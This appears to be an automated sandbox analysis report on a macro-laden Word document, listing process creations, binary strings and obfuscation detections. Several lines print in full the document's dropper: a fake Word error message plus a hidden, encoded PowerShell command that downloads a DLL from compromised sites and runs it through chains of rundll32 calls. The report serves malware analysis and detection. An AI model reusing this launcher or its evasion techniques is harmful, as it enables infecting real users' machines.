                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbC:\W source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb!! source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbon.dll source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: ws\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dllem.pdb5\ source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2100799855.0000000002AF0000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: Binary string: m.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2100862413.0000000002B87000.00000004.00000040.sdmp
                      Source: MAIL-0573188.docInitial sample: OLE summary subject = Argentina Pass Adaptive transitional override payment haptic Handcrafted Cotton Towels

                      Data Obfuscation:

                      barindex
                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
                      Source: MAIL-0573188.docStream path 'Macros/VBA/Owppnp8hah4xo788' : High number of GOTO operations
                      Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Owppnp8hah4xo788
                      Obfuscated command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
                      PowerShell case anomaly foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7AC